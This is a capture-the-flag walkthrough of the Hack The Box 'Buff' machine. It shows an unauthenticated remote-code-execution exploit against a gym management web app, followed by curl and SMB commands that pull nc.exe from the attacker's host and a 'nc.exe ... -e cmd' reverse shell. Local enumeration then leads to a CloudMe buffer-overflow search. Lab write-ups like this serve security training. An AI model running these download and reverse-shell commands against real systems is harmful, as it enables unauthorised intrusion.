Buff-htb-writeup

0x00 Skills covered

Skills in this chapter: identifying vulnerabilities from a CMS version string, transferring files to the target, building a reverse shell, port forwarding, locating a vulnerable process and its executable on disk, modifying exploit code

Reference: https://0xdf.gitlab.io/2020/11/21/htb-buff.html

Reference: https://www.jgeek.cn/article/64

Reference: https://4wayhandshake.github.io/walkthrough/buff/

0x01 Getting user access

1. Target IP address: 10.10.10.198

2. Scan for open ports:

PORT     STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION

3. Browse to the open port and look at the web application:

http://10.10.10.198:8080/contact.php

mrb3n's Bro Hut
Made using Gym Management Software 1.0

4. The page footer discloses the CMS version, so search the exploit database for it directly

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit Gym Management
----------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

5. There are quite a few vulnerabilities; try the unauthenticated remote code execution one first

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m php/webapps/48506.py
Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
URL: https://www.exploit-db.com/exploits/48506
Path: /usr/share/exploitdb/exploits/php/webapps/48506.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/48506.py


┌──(kali㉿offsec)-[~/Desktop]
└─$ python2 48506.py
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/

(+) Usage: python 48506.py <WEBAPP_URL>
(+) Example: python 48506.py 'https://10.0.0.3:443/gym/'

┌──(kali㉿offsec)-[~/Desktop]
└─$ python2 48506.py 'http://10.10.10.198:8080/'
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG

buff\shaun

C:\xampp\htdocs\gym\upload>

6. Command execution works, so grab the first flag

C:\xampp\htdocs\gym\upload> type \users\shaun\desktop\user.txt
�PNG

9be638ffe8266043e9ba9bd4908b9094

C:\xampp\htdocs\gym\upload>

0x02 Getting administrator access

7. A quick look at the server information

C:\xampp\htdocs\gym\upload> ipconfig
�PNG


Windows IP Configuration


Ethernet adapter Ethernet0:

Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::d1
IPv6 Address. . . . . . . . . . . : dead:beef::c519:e7:7d70:321e
Temporary IPv6 Address. . . . . . : dead:beef::4460:cb31:e2b9:7591
Link-local IPv6 Address . . . . . : fe80::c519:e7:7d70:321e%10
IPv4 Address. . . . . . . . . . . : 10.10.10.198
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d291%10
10.10.10.2

C:\xampp\htdocs\gym\upload> systeminfo
�PNG


Host Name: BUFF
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: shaun
Registered Organization:
Product ID: 00329-10280-00000-AA218
Original Install Date: 16/06/2020, 14:05:58
System Boot Time: 25/02/2024, 09:46:54
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,680 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,279 MB
Virtual Memory: In Use: 1,520 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.198
[02]: fe80::c519:e7:7d70:321e
[03]: dead:beef::4460:cb31:e2b9:7591
[04]: dead:beef::c519:e7:7d70:321e
[05]: dead:beef::d1
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

C:\xampp\htdocs\gym\upload>

8. The command shell provided by the Python exploit is awkward for further work, so here are two ways to upload a reverse shell:

9. The target has curl, which can be used to download nc and get a reverse shell

C:\xampp\htdocs\gym\upload> curl -h
�PNG

Usage: curl [options...] <url>
--abstract-unix-socket <path> Connect via abstract Unix domain socket
--anyauth Pick any authentication method
-a, --append Append to target file when uploading
--basic Use HTTP Basic Authentication
--cacert <CA certificate> CA certificate to verify peer against
--capath <dir> CA directory to verify peer against


curl http://10.10.14.3:8000/nc_64_bits.exe -o C:\Users\shaun\Downloads\nc.exe


┌──(kali㉿offsec)-[~/Desktop/tools/Reverse-Shell-List]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.198 - - [25/Feb/2024 17:57:25] "GET /nc_64_bits.exe HTTP/1.1" 200 -


C:\xampp\htdocs\gym\upload> curl http://10.10.14.3:8000/nc.exe -o C:\Users\shaun\Downloads\nc.exe
�PNG


C:\xampp\htdocs\gym\upload> dir C:\Users\shaun\Downloads /a
�PNG

Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\Users\shaun\Downloads

25/02/2024 09:57 <DIR> .
25/02/2024 09:57 <DIR> ..
16/06/2020 15:26 17,830,824 CloudMe_1112.exe
16/06/2020 21:21 282 desktop.ini
25/02/2024 09:57 43,696 nc.exe
3 File(s) 17,874,802 bytes
2 Dir(s) 7,175,868,416 bytes free

C:\xampp\htdocs\gym\upload>


C:\Users\shaun\Downloads\nc.exe 10.10.14.3 443 -e cmd

C:\Users\shaun\Downloads\nc.exe -e cmd 10.10.14.3 443


C:\xampp\htdocs\gym\upload> C:\Users\shaun\Downloads\nc.exe 10.10.14.3 443 -e cmd

C:\xampp\htdocs\gym\upload> C:\Users\shaun\Downloads\nc.exe -e cmd 10.10.14.3 443

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.198] 49681
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun

C:\xampp\htdocs\gym\upload>

10. Upload nc over SMB and get an interactive reverse shell

smbserver.py share . -smb2support -username test -password test

net use \\10.10.14.3\share /u:test test

copy \\10.10.14.3\share\nc.exe C:\Users\shaun\Downloads\nc.exe



┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ impacket-smbserver share . -smb2support -username test -password test
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.198,49691)
[*] AUTHENTICATE_MESSAGE (\test,BUFF)
[*] User BUFF\test authenticated successfully
[*] test:::aaaaaaaaaaaaaaaa:620adfacdba45695cc59680d95cb27ce:0101000000000000805daa37e367da01352da589ac34e8e1000000000100100061006b005100610052005500540049000300100061006b0051006100520055005400490002001000480069004d0053004a00640068004e0004001000480069004d0053004a00640068004e0007000800805daa37e367da010600040002000000080030003000000000000000000000000020000006b903bf8f5405e675677e6e169fea1f4774830f77008eccce9cb123501a18130a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0033000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
[*] Connecting Share(3:IPC$)
[*] Disconnecting Share(3:IPC$)


C:\xampp\htdocs\gym\upload> dir C:\Users\shaun\Downloads /a
�PNG

Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\Users\shaun\Downloads

25/02/2024 11:54 <DIR> .
25/02/2024 11:54 <DIR> ..
16/06/2020 15:26 17,830,824 CloudMe_1112.exe
16/06/2020 21:21 282 desktop.ini
2 File(s) 17,831,106 bytes
2 Dir(s) 8,830,144,512 bytes free

C:\xampp\htdocs\gym\upload> net use \\10.10.14.3\share /u:test test
�PNG

The command completed successfully.


C:\xampp\htdocs\gym\upload> dir \\10.10.14.3\share
�PNG

Volume in drive \\10.10.14.3\share has no label.
Volume Serial Number is ABCD-EFAA

Directory of \\10.10.14.3\share

02/02/2024 02:41 <DIR> frp_0.43.0_linux_amd64
02/02/2024 02:42 <DIR> frp_0.43.0_linux_arm64
23/02/2024 07:51 <DIR> htb-portscan
12/11/2023 12:55 <DIR> pspy
13/05/2005 09:53 68,608 nc.exe
1 File(s) 84,992 bytes
4 Dir(s) 0 bytes free

C:\xampp\htdocs\gym\upload> copy \\10.10.14.3\share\nc.exe C:\Users\shaun\Downloads\nc.exe
�PNG

1 file(s) copied.

C:\xampp\htdocs\gym\upload> dir C:\Users\shaun\Downloads /a
�PNG

Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\Users\shaun\Downloads

25/02/2024 12:09 <DIR> .
25/02/2024 12:09 <DIR> ..
16/06/2020 15:26 17,830,824 CloudMe_1112.exe
16/06/2020 21:21 282 desktop.ini
13/05/2005 09:53 68,608 nc.exe
3 File(s) 17,899,714 bytes
2 Dir(s) 9,022,291,968 bytes free

C:\xampp\htdocs\gym\upload>

11. Basic enumeration from the reverse shell

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.198] 49686
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>cd C:\
cd C:\

C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\

16/06/2020 18:08 <DIR> PerfLogs
16/06/2020 19:37 <DIR> Program Files
12/04/2018 09:16 <DIR> Program Files (x86)
16/06/2020 19:52 <DIR> Users
18/07/2020 16:35 <DIR> Windows
16/06/2020 15:40 <DIR> xampp
0 File(s) 0 bytes
6 Dir(s) 7,422,586,880 bytes free

C:\>cd Users
cd Users

C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\Users

16/06/2020 19:52 <DIR> .
16/06/2020 19:52 <DIR> ..
20/07/2020 11:08 <DIR> Administrator
16/06/2020 14:08 <DIR> Public
16/06/2020 14:11 <DIR> shaun
0 File(s) 0 bytes
5 Dir(s) 7,423,766,528 bytes free

C:\Users>cd shaun
cd shaun

C:\Users\shaun>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\Users\shaun

16/06/2020 14:11 <DIR> .
16/06/2020 14:11 <DIR> ..
16/06/2020 21:21 <DIR> 3D Objects
16/06/2020 21:21 <DIR> Contacts
14/07/2020 12:27 <DIR> Desktop
16/06/2020 21:26 <DIR> Documents
25/02/2024 10:20 <DIR> Downloads
16/06/2020 21:21 <DIR> Favorites
16/06/2020 21:21 <DIR> Links
16/06/2020 21:21 <DIR> Music
16/06/2020 16:22 <DIR> OneDrive
16/06/2020 21:21 <DIR> Pictures
16/06/2020 21:21 <DIR> Saved Games
16/06/2020 21:21 <DIR> Searches
16/06/2020 21:21 <DIR> Videos
0 File(s) 0 bytes
15 Dir(s) 7,423,766,528 bytes free

C:\Users\shaun>cd Desktop
cd Desktop

C:\Users\shaun\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\Users\shaun\Desktop

14/07/2020 12:27 <DIR> .
14/07/2020 12:27 <DIR> ..
25/02/2024 09:48 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 7,423,758,336 bytes free

C:\Users\shaun\Desktop>type user.txt
type user.txt
023ebbe863af0c29b3e03f741dc348fd

C:\Users\shaun\Desktop>

12. Check which ports are listening

C:\xampp\htdocs\gym\upload>netstat -ano
netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5008
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 7276
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 6536
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 520
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 972
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1464
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2240
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 692
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.198:8080 10.10.14.3:37834 ESTABLISHED 6536
TCP 10.10.10.198:49692 10.10.14.3:443 ESTABLISHED 4664
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8144
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 8108
TCP [::]:135 [::]:0 LISTENING 952
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 7276
TCP [::]:8080 [::]:0 LISTENING 6536
TCP [::]:49664 [::]:0 LISTENING 520
TCP [::]:49665 [::]:0 LISTENING 972
TCP [::]:49666 [::]:0 LISTENING 1464
TCP [::]:49667 [::]:0 LISTENING 2240
TCP [::]:49668 [::]:0 LISTENING 668
TCP [::]:49669 [::]:0 LISTENING 692
UDP 0.0.0.0:123 *:* 6480
UDP 0.0.0.0:5050 *:* 5008
UDP 0.0.0.0:5353 *:* 1344
UDP 0.0.0.0:5355 *:* 1344
UDP 0.0.0.0:60106 *:* 1344
UDP 10.10.10.198:137 *:* 4
UDP 10.10.10.198:138 *:* 4
UDP 10.10.10.198:1900 *:* 7448
UDP 10.10.10.198:49156 *:* 7448
UDP 127.0.0.1:1900 *:* 7448
UDP 127.0.0.1:49157 *:* 7448
UDP 127.0.0.1:64850 *:* 3024
UDP [::]:123 *:* 6480
UDP [::]:5353 *:* 1344
UDP [::]:5355 *:* 1344
UDP [::]:60106 *:* 1344
UDP [::1]:1900 *:* 7448
UDP [::1]:49155 *:* 7448
UDP [fe80::c519:e7:7d70:321e%10]:1900 *:* 7448
UDP [fe80::c519:e7:7d70:321e%10]:49154 *:* 7448

C:\xampp\htdocs\gym\upload>

C:\xampp\htdocs\gym\upload>netstat -ano | findstr TCP | findstr ":0"
netstat -ano | findstr TCP | findstr ":0"
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5008
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 7276
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 6536
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 520
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 972
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1464
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2240
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 692
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8144
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 4472
TCP [::]:135 [::]:0 LISTENING 952
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 7276
TCP [::]:8080 [::]:0 LISTENING 6536
TCP [::]:49664 [::]:0 LISTENING 520
TCP [::]:49665 [::]:0 LISTENING 972
TCP [::]:49666 [::]:0 LISTENING 1464
TCP [::]:49667 [::]:0 LISTENING 2240
TCP [::]:49668 [::]:0 LISTENING 668
TCP [::]:49669 [::]:0 LISTENING 692

C:\xampp\htdocs\gym\upload>

13. Port 8888 is listening on loopback only; look up the owning process to identify the program

tasklist /v | findstr 9136

14. When trying to look it up, the PID keeps changing, so dump netstat and tasklist together and see whether the process can be matched that way

netstat -ano & tasklist

C:\xampp\htdocs\gym\upload>netstat -ano & tasklist
netstat -ano & tasklist

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5008
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 7276
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 6536
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 520
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 972
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1464
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2240
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 692
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.198:8080 10.10.14.3:37834 ESTABLISHED 6536
TCP 10.10.10.198:49692 10.10.14.3:443 ESTABLISHED 4664
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8144
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 3536
TCP [::]:135 [::]:0 LISTENING 952
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 7276
TCP [::]:8080 [::]:0 LISTENING 6536
TCP [::]:49664 [::]:0 LISTENING 520
TCP [::]:49665 [::]:0 LISTENING 972
TCP [::]:49666 [::]:0 LISTENING 1464
TCP [::]:49667 [::]:0 LISTENING 2240
TCP [::]:49668 [::]:0 LISTENING 668
TCP [::]:49669 [::]:0 LISTENING 692
UDP 0.0.0.0:123 *:* 6480
UDP 0.0.0.0:5050 *:* 5008
UDP 0.0.0.0:5353 *:* 1344
UDP 0.0.0.0:5355 *:* 1344
UDP 0.0.0.0:56180 *:* 1344
UDP 10.10.10.198:137 *:* 4
UDP 10.10.10.198:138 *:* 4
UDP 10.10.10.198:1900 *:* 7448
UDP 10.10.10.198:49156 *:* 7448
UDP 127.0.0.1:1900 *:* 7448
UDP 127.0.0.1:49157 *:* 7448
UDP 127.0.0.1:64850 *:* 3024
UDP [::]:123 *:* 6480
UDP [::]:5353 *:* 1344
UDP [::]:5355 *:* 1344
UDP [::]:56180 *:* 1344
UDP [::1]:1900 *:* 7448
UDP [::1]:49155 *:* 7448
UDP [fe80::c519:e7:7d70:321e%10]:1900 *:* 7448
UDP [fe80::c519:e7:7d70:321e%10]:49154 *:* 7448

Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 8 K
System 4 0 20 K
Registry 104 0 4,020 K
smss.exe 364 0 384 K
csrss.exe 444 0 1,820 K
wininit.exe 520 0 1,104 K
csrss.exe 532 1 1,620 K
winlogon.exe 596 1 1,572 K
services.exe 668 0 6,152 K
lsass.exe 692 0 8,564 K
svchost.exe 796 0 780 K
svchost.exe 820 0 15,800 K
fontdrvhost.exe 844 0 16,884 K
fontdrvhost.exe 852 1 1,328 K
svchost.exe 952 0 9,060 K
svchost.exe 996 0 2,936 K
dwm.exe 320 1 28,376 K
svchost.exe 408 0 2,948 K
svchost.exe 972 0 12,708 K
svchost.exe 1032 0 1,868 K
svchost.exe 1048 0 4,456 K
svchost.exe 1156 0 12,648 K
svchost.exe 1172 0 4,108 K
svchost.exe 1228 0 3,764 K
svchost.exe 1404 0 5,040 K
svchost.exe 1436 0 1,736 K
svchost.exe 1464 0 8,464 K
svchost.exe 1472 0 5,292 K
svchost.exe 1480 0 1,348 K
svchost.exe 1492 0 5,008 K
svchost.exe 1504 0 5,264 K
Memory Compression 1648 0 25,876 K
svchost.exe 1676 0 1,672 K
svchost.exe 1780 0 1,288 K
svchost.exe 1788 0 4,340 K
svchost.exe 1812 0 2,772 K
svchost.exe 1992 0 2,028 K
svchost.exe 2000 0 3,444 K
svchost.exe 1316 0 1,388 K
svchost.exe 1344 0 4,460 K
svchost.exe 1336 0 2,980 K
svchost.exe 2100 0 1,768 K
svchost.exe 2116 0 5,032 K
spoolsv.exe 2240 0 4,280 K
svchost.exe 2252 0 3,720 K
svchost.exe 2384 0 3,116 K
svchost.exe 2640 0 3,284 K
svchost.exe 2648 0 15,516 K
svchost.exe 2660 0 26,140 K
svchost.exe 2668 0 12,632 K
svchost.exe 2720 0 1,308 K
svchost.exe 2728 0 3,848 K
vmtoolsd.exe 2748 0 10,668 K
VGAuthService.exe 2760 0 2,304 K
svchost.exe 2772 0 1,060 K
SecurityHealthService.exe 2784 0 4,396 K
svchost.exe 2792 0 4,268 K
MsMpEng.exe 2804 0 142,356 K
svchost.exe 2984 0 1,044 K
svchost.exe 3024 0 3,912 K
svchost.exe 3088 0 2,716 K
dllhost.exe 3800 0 4,704 K
WmiPrvSE.exe 3960 0 13,352 K
msdtc.exe 352 0 2,348 K
NisSrv.exe 4604 0 4,340 K
svchost.exe 4652 0 16,296 K
sihost.exe 4796 1 14,808 K
svchost.exe 4848 1 5,008 K
svchost.exe 4904 1 16,996 K
taskhostw.exe 5012 1 7,156 K
svchost.exe 5104 0 1,548 K
ctfmon.exe 1096 1 3,588 K
svchost.exe 4360 0 8,616 K
explorer.exe 5488 1 38,300 K
svchost.exe 5840 0 1,632 K
svchost.exe 5916 0 2,880 K
ShellExperienceHost.exe 2468 1 40,808 K
SearchUI.exe 5496 1 84,592 K
RuntimeBroker.exe 5056 1 12,192 K
svchost.exe 5008 0 4,032 K
RuntimeBroker.exe 6160 1 11,620 K
SearchIndexer.exe 6432 0 16,816 K
ApplicationFrameHost.exe 6608 1 8,620 K
MicrosoftEdge.exe 6860 1 12,936 K
browser_broker.exe 6984 1 1,620 K
svchost.exe 7052 0 1,248 K
Windows.WARP.JITService.e 6188 0 884 K
RuntimeBroker.exe 5660 1 1,420 K
svchost.exe 7232 0 7,864 K
MicrosoftEdgeCP.exe 7424 1 4,160 K
MicrosoftEdgeCP.exe 7436 1 3,576 K
svchost.exe 7448 0 1,744 K
svchost.exe 7880 0 3,324 K
RuntimeBroker.exe 8088 1 17,184 K
conhost.exe 5240 0 536 K
vmtoolsd.exe 548 1 4,604 K
httpd.exe 6536 0 60 K
mysqld.exe 8144 0 9,308 K
svchost.exe 8944 0 2,468 K
svchost.exe 9168 1 7,844 K
httpd.exe 8320 0 2,416 K
svchost.exe 7276 0 7,512 K
SgrmBroker.exe 1412 0 2,964 K
svchost.exe 6628 0 4,240 K
Microsoft.Photos.exe 7764 1 27,596 K
RuntimeBroker.exe 456 1 10,328 K
WinStore.App.exe 4228 1 356 K
RuntimeBroker.exe 328 1 1,492 K
SystemSettings.exe 2816 1 696 K
svchost.exe 3820 0 2,336 K
taskhostw.exe 8772 1 11,476 K
TrustedInstaller.exe 6676 0 3,940 K
TiWorker.exe 2248 0 227,324 K
svchost.exe 6480 0 2,480 K
svchost.exe 3612 0 2,048 K
svchost.exe 4196 0 1,120 K
cmd.exe 7988 0 240 K
conhost.exe 6720 0 716 K
nc.exe 4664 0 452 K
cmd.exe 3040 0 1,796 K
cmd.exe 7092 0 3,292 K
conhost.exe 8148 0 11,076 K
CloudMe.exe 3536 0 36,764 K
timeout.exe 6496 0 3,968 K
tasklist.exe 4924 0 7,760 K

C:\xampp\htdocs\gym\upload>



Proto Local Address Foreign Address State PID
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 3536


Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
CloudMe.exe 3536 0 36,764 K

15. Finally located. The PID probably keeps changing because the program is repeatedly exiting and being restarted. It has the same name as the installer in the Downloads directory:

16/06/2020  15:26        17,830,824 CloudMe_1112.exe
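The `netstat -ano & tasklist` trick in step 14 is a join on the PID column done by eye, and it only works if the process is still alive when tasklist runs. The following script does the same join programmatically and reports any listener whose PID has already vanished from the process list, which is exactly the symptom seen with the restarting CloudMe.exe; it also lists the loopback-only TCP services, the ones an external port scan cannot see. This is an added example written for this page, not code from the writeup; the two sample outputs are constructed from lines shown above and trimmed, and all function names are this example's own.

```python
"""Join `netstat -ano` listeners to `tasklist` entries by PID (added example)."""

# Constructed sample: a few lines trimmed from the page's `netstat -ano` output.
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       6536
  TCP    10.10.10.198:49692     10.10.14.3:443         ESTABLISHED     4664
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       8144
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       3536
  TCP    [::]:8080              [::]:0                 LISTENING       6536
  UDP    0.0.0.0:123            *:*                                    6480
"""

# Constructed sample: trimmed from the page's `tasklist` output. PID 6480 is
# deliberately left out to mimic a process that exited between the two snapshots.
TASKLIST_SAMPLE = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          8 K
httpd.exe                     6536 Services                   0         60 K
mysqld.exe                    8144 Services                   0      9,308 K
nc.exe                        4664 Services                   0        452 K
CloudMe.exe                   3536 Services                   0     36,764 K
"""


def parse_tasklist(text):
    """Map PID -> image name. Works whether or not the Session Name column is present."""
    procs = {}
    for line in text.splitlines():
        parts = line.split()
        # Every data row ends with "<mem> K"; the header and separator rows do not.
        if len(parts) < 4 or parts[-1] != "K":
            continue
        rest = parts[:-3]            # drop: memory value, "K", Session#
        if rest and not rest[-1].isdigit():
            rest = rest[:-1]         # drop Session Name (e.g. Services, Console)
        if not rest or not rest[-1].isdigit():
            continue
        procs[int(rest[-1])] = " ".join(rest[:-1])   # image names may contain spaces
    return procs


def parse_listeners(text):
    """Yield (proto, local_address, pid) for every TCP LISTENING and UDP socket."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP" and parts[3] == "LISTENING":
            yield "TCP", parts[1], int(parts[4])
        elif len(parts) == 4 and parts[0] == "UDP":   # UDP rows carry no State column
            yield "UDP", parts[1], int(parts[3])


def listening_ports_by_process(netstat_text, tasklist_text):
    """Return {(proto, local_address): image_name}.

    A PID present in netstat but absent from tasklist is reported explicitly
    rather than dropped, so a short-lived or restarting service is still visible.
    """
    procs = parse_tasklist(tasklist_text)
    mapping = {}
    for proto, local, pid in parse_listeners(netstat_text):
        mapping[(proto, local)] = procs.get(pid, f"<pid {pid} not in tasklist>")
    return mapping


def loopback_listeners(mapping):
    """TCP services bound only to loopback: not reachable from the network, so
    they never show up in an external port scan and deserve a separate review."""
    return sorted(
        (local, image)
        for (proto, local), image in mapping.items()
        if proto == "TCP" and (local.startswith("127.") or local.startswith("[::1]"))
    )


if __name__ == "__main__":
    result = listening_ports_by_process(NETSTAT_SAMPLE, TASKLIST_SAMPLE)
    for (proto, local), image in sorted(result.items()):
        print(f"{proto:3} {local:24} {image}")
    print("loopback-only:", loopback_listeners(result))
```

On a real host, feed the script the saved output of the two commands; even when both are run from one command line with `&`, the snapshots are still taken a moment apart, which is why the unmatched-PID case is reported instead of silently discarded.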

16. Search for known vulnerabilities in it:

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit CloudMe
----------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

